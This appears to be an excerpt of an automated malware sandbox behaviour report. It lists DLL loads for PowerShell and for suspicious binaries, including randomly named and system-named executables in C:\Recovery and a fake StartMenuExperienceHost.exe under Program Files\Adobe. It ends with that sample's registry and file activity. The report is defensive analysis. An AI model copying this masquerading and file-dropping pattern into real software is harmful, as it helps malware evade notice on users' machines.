                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: version.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: wldp.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: profapi.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\SgrmBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: version.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: wldp.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: profapi.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: version.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: wldp.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: profapi.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\SystemSettings.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: version.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDirectory created: C:\Program Files\Adobe\StartMenuExperienceHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDirectory created: C:\Program Files\Adobe\55b276f4edf653Jump to behavior
